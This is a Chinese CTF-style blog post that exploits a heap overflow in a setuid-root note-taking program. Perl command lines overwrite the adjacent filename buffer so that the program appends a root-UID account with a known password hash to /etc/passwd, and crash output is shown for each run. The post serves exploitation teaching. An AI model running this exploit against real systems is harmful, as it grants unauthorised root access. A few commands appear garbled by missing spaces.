基本的基于堆的栈溢出

最新推荐文章于 2024-07-19 19:25:57 发布
最新推荐文章于 2024-07-19 19:25:57 发布
阅读量308 收藏 1
点赞数 1
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/getsum/article/details/85855522
版权

该漏洞发掘的目的是向password文件添加一个具有root权限和已知密码项的额外项

在linux环境下实现。目标程序notetaker.c,源码如下:

void fatal(char *message){
    char error_message[100];
    strcpy(error_message,"[!!]Fatal Error ");
    strncat(error_message,message,83);
    perror(error_message);
    exit(-1);
}
void *ec_malloc(unsigned int size){
    void *ptr;
    ptr=malloc(size);
    if(ptr==NULL)
        fatal("in ec_malloc() on memory allocation");
    return ptr;
}
hacking.h源码
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
#include"hacking.h"
void usage(char *prog_name,char *filename){
    printf("Usage: %s <data to add to %s>\n",prog_name,filename);
    exit(0);
}
int main(int argc,char *argv[]){
    int userid,fd;
    char *buffer,*datafile;
    buffer=(char *)ec_malloc(100);
    datafile=(char *)ec_malloc(20);
    strcpy(datafile,"/var/notes");
    if(argc<2)usage(argv[0],datafile);
    strcpy(buffer,argv[1]);
    printf("[DEBUG] buffer @%p: \'%s\'\n",buffer,buffer);
    printf("[DEBUG] datafile @%p: \'%s\'\n",datafile,datafile);
    fd=open(datafile,O_WRONLY|O_CREAT|O_APPEND,S_IRUSR|S_IWUSR);
    if(fd==-1)fatal("in main() while opening file");
    printf("[DEBUG] file descriptor is %d\n",fd);
    userid= getuid();
    if(write(fd,&userid,4)==-1)
        fatal("in main() while writing userid to file");
    write(fd,"\n",1);
    if(write(fd,buffer,strlen(buffer))==-1)
        fatal("in main() while writing userid to file");
    write(fd,"\n",1);
    if(close(fd)==-1)
        fatal("in main() while closing file");
    printf("Note has been saved.\n");
    free(buffer);
    free(datafile);
}

该代码是通过命令行参数向/var/notes文件输入一段文本。但是容易受到缓冲区溢出攻击。

在上面的操作中,notetaker被编译并且所有者变为root。现在运行notetaker时,程序以root身份运行,创建/var/notes的时候所有者也是root。 

根据以上信息,一般情况下,缓冲区分配的储存单元位于0x13d4010,它位于在0x13d4080处为datafile分配的储存单元之前。这两个地址之间距离为16*7=112字节。

由于第一个缓冲区是以null结尾,所以可以放到这个缓冲区的最大数量也应该是112字节,这样才不会溢出到下一个缓冲区。 

 

尝试放入112个字节时,果然在第一个缓冲区刚好放入112个字节。由于null终止符字节溢出到datafile缓冲区,因此datafile内除了一个null不包含任何东西。同时这个null也肯定不可能当作一个文件打开。

因此我们可以想到:是否可以通过把一个文件路径溢出到datafile缓冲区,以此达到对其他文件的修改呢?答案是可以的。

supergate@ubuntu:~/Desktop/C work$ ./notetaker $(perl -e 'print "a"x112 ."testfile"')
[DEBUG] buffer @0x1ae8010: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaatestfile'
[DEBUG] datafile @0x1ae8080: 'testfile'
[DEBUG] file descriptor is 3
Note has been saved.
*** Error in `./notetaker': free(): invalid next size (fast): 0x0000000001ae8010 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fec06af77e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fec06b0037a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fec06b0453c]
./notetaker[0x400b7a]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fec06aa0830]
./notetaker[0x400829]
======= Memory map: ========
00400000-00401000 r-xp 00000000 08:01 720136                             /home/supergate/Desktop/C work/notetaker
00601000-00602000 r--p 00001000 08:01 720136                             /home/supergate/Desktop/C work/notetaker
00602000-00603000 rw-p 00002000 08:01 720136                             /home/supergate/Desktop/C work/notetaker
01ae8000-01b09000 rw-p 00000000 00:00 0                                  [heap]
7fec00000000-7fec00021000 rw-p 00000000 00:00 0 
7fec00021000-7fec04000000 ---p 00000000 00:00 0 
7fec06868000-7fec0687f000 r-xp 00000000 08:01 919459                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7fec0687f000-7fec06a7e000 ---p 00017000 08:01 919459                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7fec06a7e000-7fec06a7f000 r--p 00016000 08:01 919459                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7fec06a7f000-7fec06a80000 rw-p 00017000 08:01 919459                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7fec06a80000-7fec06c40000 r-xp 00000000 08:01 920000                     /lib/x86_64-linux-gnu/libc-2.23.so
7fec06c40000-7fec06e40000 ---p 001c0000 08:01 920000                     /lib/x86_64-linux-gnu/libc-2.23.so
7fec06e40000-7fec06e44000 r--p 001c0000 08:01 920000                     /lib/x86_64-linux-gnu/libc-2.23.so
7fec06e44000-7fec06e46000 rw-p 001c4000 08:01 920000                     /lib/x86_64-linux-gnu/libc-2.23.so
7fec06e46000-7fec06e4a000 rw-p 00000000 00:00 0 
7fec06e4a000-7fec06e70000 r-xp 00000000 08:01 919972                     /lib/x86_64-linux-gnu/ld-2.23.so
7fec07051000-7fec07054000 rw-p 00000000 00:00 0 
7fec0706e000-7fec0706f000 rw-p 00000000 00:00 0 
7fec0706f000-7fec07070000 r--p 00025000 08:01 919972                     /lib/x86_64-linux-gnu/ld-2.23.so
7fec07070000-7fec07071000 rw-p 00026000 08:01 919972                     /lib/x86_64-linux-gnu/ld-2.23.so
7fec07071000-7fec07072000 rw-p 00000000 00:00 0 
7ffe6e271000-7ffe6e292000 rw-p 00000000 00:00 0                          [stack]
7ffe6e365000-7ffe6e368000 r--p 00000000 00:00 0                          [vvar]
7ffe6e368000-7ffe6e36a000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
Aborted (core dumped)

 这次我们使用testfile覆盖了datafile缓冲区,这会导致程序将文本内容写入到testfile而不是原本的/var/notes文件中。

不过在使用free()释放堆程序的时候,会检测出堆头的错误,程序于是终止。不过在调用free()的时候,已经欺骗程序以root权限将数据写入到一个新文件中。可用命令 sudo cat ./testfile 在进入testfile所在目录的情况下以root身份打开testfile文件。

这种方式可以应用到向/etc/passwd文件添加数据,这个文件包含系统所有用户的用户名称,ID和login shell。由于是比较重要的系统文件,我们在操作前记得做好备份

cp /etc/passwd/tmp/passwd.bkup
head /etc/passwd

可以看到以下类型的信息

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

内容的域用引号" : "分隔,第一个域是登录名称,后面分别是密码,userID,组ID,用户名,主目录,最后是log shell。密码域用x填充。

可以用单向散列算法对密码加密。由于算法单向,因此不能从散列值中重建原始密码。这个算法使用了一个salt值以防止字典查找攻击。

perl函数crypt()用来执行这一功能。第一个参数是密码源码,第二个参数是salt值

salt总是位于散列值开头,用户登录并且输入密码时,系统会为该用户查找已经加密的密码。通过使用相同的加密算法判断加密后的散列值是否相等

mkdir /tmp/etc
ln -s /bin/bash/tmp/etc/passwd
ls -l /tmp/etc/passwd

 以上操作将/tmp/etc/passwd指向login shell/bin/bash 这意味着password 文件的有效logshell在/tmp/etc/passwd也有效。使得:

myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd

成为一个有效的password文件行

对这行修改,使得在/etc/passwd之前部分长度正好112字节。

所以进行如下操作:

./notetaker $(perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" ."a"x76 .":/root:/tmp/etc/passwd"')

得到如下结果:

[DEBUG] buffer @0x25d4010: 'myroot:XXq2wKiyI43A2:0:0:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:/root:/tmp/etc/passwd'
[DEBUG] datafile @0x25d4080: '/etc/passwd'
[DEBUG] file descriptor is 3
Note has been saved.
*** Error in `./notetaker': free(): invalid next size (fast): 0x00000000025d4010 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f1a45f317e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f1a45f3a37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f1a45f3e53c]
./notetaker[0x400b7a]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f1a45eda830]
./notetaker[0x400829]
======= Memory map: ========
00400000-00401000 r-xp 00000000 08:01 712973                             /home/supergate/Desktop/C work/notetaker
00601000-00602000 r--p 00001000 08:01 712973                             /home/supergate/Desktop/C work/notetaker
00602000-00603000 rw-p 00002000 08:01 712973                             /home/supergate/Desktop/C work/notetaker
025d4000-025f5000 rw-p 00000000 00:00 0                                  [heap]
7f1a40000000-7f1a40021000 rw-p 00000000 00:00 0 
7f1a40021000-7f1a44000000 ---p 00000000 00:00 0 
7f1a45ca2000-7f1a45cb9000 r-xp 00000000 08:01 919459                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f1a45cb9000-7f1a45eb8000 ---p 00017000 08:01 919459                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f1a45eb8000-7f1a45eb9000 r--p 00016000 08:01 919459                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f1a45eb9000-7f1a45eba000 rw-p 00017000 08:01 919459                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f1a45eba000-7f1a4607a000 r-xp 00000000 08:01 920000                     /lib/x86_64-linux-gnu/libc-2.23.so
7f1a4607a000-7f1a4627a000 ---p 001c0000 08:01 920000                     /lib/x86_64-linux-gnu/libc-2.23.so
7f1a4627a000-7f1a4627e000 r--p 001c0000 08:01 920000                     /lib/x86_64-linux-gnu/libc-2.23.so
7f1a4627e000-7f1a46280000 rw-p 001c4000 08:01 920000                     /lib/x86_64-linux-gnu/libc-2.23.so
7f1a46280000-7f1a46284000 rw-p 00000000 00:00 0 
7f1a46284000-7f1a462aa000 r-xp 00000000 08:01 919972                     /lib/x86_64-linux-gnu/ld-2.23.so
7f1a4648b000-7f1a4648e000 rw-p 00000000 00:00 0 
7f1a464a8000-7f1a464a9000 rw-p 00000000 00:00 0 
7f1a464a9000-7f1a464aa000 r--p 00025000 08:01 919972                     /lib/x86_64-linux-gnu/ld-2.23.so
7f1a464aa000-7f1a464ab000 rw-p 00026000 08:01 919972                     /lib/x86_64-linux-gnu/ld-2.23.so
7f1a464ab000-7f1a464ac000 rw-p 00000000 00:00 0 
7ffd91750000-7ffd91771000 rw-p 00000000 00:00 0                          [stack]
7ffd917f4000-7ffd917f7000 r--p 00000000 00:00 0                          [vvar]
7ffd917f7000-7ffd917f9000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
Aborted (core dumped)

然后尝试如下操作

自此,我们就建立了一个新用户myroot,拥有root权限。

由于散列值是"password"以salt为"XX"加密的,因此myroot的密码为password。 

SuperGate
关注
专栏目录
性能优化-内存泄漏、内存溢出、cpu占用高、死锁、栈溢出、FullGC频繁检测手段-总结与分享
Linuxhus的博客
12-17 2054
含义:内层溢出通俗理解就是内存不够,程序要求的内存超出了系统所能分配的范围。危害:内存溢出错误会导致处理数据的任务失败,甚至会引发平台崩溃等严重后果。应用程序CPU使用率高,甚至超过100%死锁是指两个或两个以上的进程在执行过程中,由于竞争资源或者由于彼此通信而造成的一种阻塞的现象,若无外力作用,它们都将无法推进下去。此时称系统处于死锁状态或系统产生了死锁,这些永远在互相等待的进程称为死锁进程。Java 里的 StackOverflowError。抛出这个错误表明应用程序因为深递归导致栈被耗尽了。
嵌入式编程中的栈溢出检测
smallerxuan的博客
07-09 1万+
在嵌入式编程中,栈是一个很重要的概念,不管是裸机编程还是基于RTOS编程。函数形参、局部变量、函数调用现场的保护及返回地址、中断函数执行前线程保护及中断嵌套的现场的保护都依赖于栈空间。栈空间不足,程序执行过程中栈溢出,极大可能的影响程序、系统的稳定,严重时会造成程序、系统的崩溃,所以栈溢出检测十分重要且必要。 什么是,什么是栈 和栈都是指预先分配的空间,有大小限制,两者通常是相邻的两个内存区域(RTOS中任务的和栈可能不相邻),供程序使用,和栈的最大差异是,空间通过xxmal...
内存溢出,栈内存溢出
weixin_43976003的博客
03-28 1195
1、首先复习一下基础知识。 从物理上讲,栈是就是一段连续分配的内存空间。在一个程序中,会声明各种变量。静态全局变量是位于数据段并且在程序开始运行的时候被加载。而程序的动态的局部变量则分配在栈里面。 从操作上来讲,栈是一个先入后出的队列。他的生长方向与内存的生长方向正好相反。我们规定内存的生长方向为向上,则栈的生长方向为向下。压栈的操作push=ESP-4,出栈的操作是pop=ESP+4.换句...
溢出崩溃vs栈溢出崩溃的内存越界对比分析
最新发布
春夜喜雨的专栏
07-19 1010
最近碰到了软件运行的两个崩溃问题,非常典型,一个溢出越界问题heap overflow,一个栈溢出越界问题statck overflow。
溢出VS栈溢出
fubicheng208的博客
05-27 1650
一、抛出异常 溢出:java.lang.OutOfMemoryError(OOM) 栈溢出:java.lang.StackOverflowError 二、原因 溢出:中对象大小大于的最大大小(往往可能时内存泄漏导致) 栈溢出: 函数体内建立很大的数组 产生了死循环,循环调用 递归次数过多,需要保存大量的局部数据,知道递归结束才释放。 ...
栈溢出溢出
学而不思则忘
06-07 4616
1. 栈溢出StackOverflowError 栈是线程私有的,生命周期与线程相同,每个方法在执行的时候都会创建一个栈帧,用来存储局部变量表,操作数栈,动态链接,方法出口等信息。 栈溢出:方法执行时创建的栈帧个数超过了栈的深度。 原因举例:方法递归 【示例】: public class StackError { private int i = 0; public void fn() { System.out.println(i++); fn();
java 栈和区别详细介绍
08-31
栈内存的存取速度比内存快,因为栈是基于先进后出的数据结构,操作起来非常简单。在栈中创建变量和销毁变量的时间几乎可以忽略不计。而内存是动态分配内存,垃圾回收器需要不定期地回收内存中的对象,这个过程...
基于Java内存溢出的解决方法详解
09-05
栈内存则主要用于存储基本类型变量和对象引用。每个线程有自己的栈,其中的局部变量在作用域结束后会被自动释放。内存则由垃圾收集器管理,新创建的对象首先在New区分配,随着GC的进行,对象会被移动到Old区。对于...
栈溢出漏洞原理及利用技巧
本章将从栈溢出漏洞的基本概念、原理以及对系统安全的影响进行详细介绍。 ### 1.1 什么是栈溢出漏洞 栈溢出漏洞是指当程序向栈空间写入超过其预留内存大小的数据时,导致覆盖了栈上相邻的内存区域,进而影响了程序...
什么情况下会发生内存溢出,栈内存溢出,结合实例说明
热门推荐
LJHSkyWalker的博客
10-09 3万+
一、 栈溢出(StackOverflowError) 栈是线程私有的,他的生命周期与线程相同,每个方法在执行的时候都会创建一个栈帧,用来存储局部变量表,操作数栈,动态链接,方法出口灯信息。局部变量表又包含基本数据类型,对象引用类型(局部变量表编译器完成,运行期间不会变化) 所以我们可以理解为栈溢出就是方法执行是创建的栈帧超过了栈的深度。那么最有可能的就是方法递归调用产生这种结果。 publ...
溢出、栈溢出的经典例子
lixuanfeng blog
06-18 4400
溢出 public class HeapOutOfMemory { public static void main(String[] args) { List list = new ArrayList(); list.add(new HeapOutOfMemory()); } } 栈溢出 public class StackOutOfMemory...
怎么才能识别出电脑的内存栈是向上溢出还是向下溢出 - Google 谷歌 百度 baidu 阿里巴巴 alibab
jgfyyfd的博客
02-04 332
怎么才能识别出电脑的内存栈是向上溢出还是向下溢出 - Google 谷歌 百度 baidu 阿里巴巴 alibab
溢出和栈溢出
On the way
07-31 4792
所谓溢出广义上就是超出范围,整数就有溢出,比如8字节无符号整数是0到255 0 - 1就是下溢 255 + 1就是上溢 说正题 int f(int x) { int a[10]; a[11] = x; } 这个就是栈溢出,x被写到了不应该写的地方。在特定编译模式下,这个x的内容就会覆盖f原来的返回地址。也就是原本应该返回到调用位置的f函数,返
理论:第十三章:溢出,栈溢出的出现场景以及解决方案
Java程序员廖志伟
07-01 7429
溢出的情况及解决方案 OutofMemoryError:Java heap space 内存中的空间不足以存放新创建的对象 OutOfMemoryError: GC overhead limit exceeded 超过98%的时间用来做GC并且回收了不到2%的内存 OutOfMemoryError: Direct buffer memory 外内存 OutofMemoryError:unable to create new native thread 解决方案: .
Windows系统弹出:“系统在此应用程序检测到基于栈的缓冲区溢出,如何解决?“解决办法
daijingxin的博客
01-10 1万+
按 “Windows 徽标键+R”,输入 “msconfig”,回车启动系统配置页面。点击 “服务”>“隐藏所有 Microsoft 服务”,点击 “全部禁用”。鼠标右击任务栏,启动任务管理器。点击 “启动” 选项卡,将所有的启动项全部禁用。通过开始菜单重启设备 (请选择重启设备,不要选择关机后再开机)。执行完毕后重启设备,查看问题是否解决。
什么是栈溢出溢出
西部壮仔的博客
06-14 6820
栈溢出是由于C语言系列没有内置检查机制来确保复制到缓冲区的数据不得大于缓冲区的大小,因此当这个数据足够大的时候,将会溢出缓冲区的范围。 溢出的产生是由于过多的函数调用,导致调用栈无法容纳这些调用的返回地址,一般在递归中产生。溢出很可能由无限递归(Infinite recursion)产生,但也可能仅仅是过多的栈层级。 int f(int x) { int a[10]; a[11] = x...
北京大学计算机研究所详解:栈溢出攻击原理与Linux/Win32防御策略
同年,M.Conover的教程则展示了基于的缓冲区溢出攻击,这是对传统栈溢出攻击的补充和扩展。 Linux和Win32环境下的栈溢出攻击各有特点。在Linux中,攻击者通常会利用栈溢出创建shellcode(一段可以被执行的代码)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值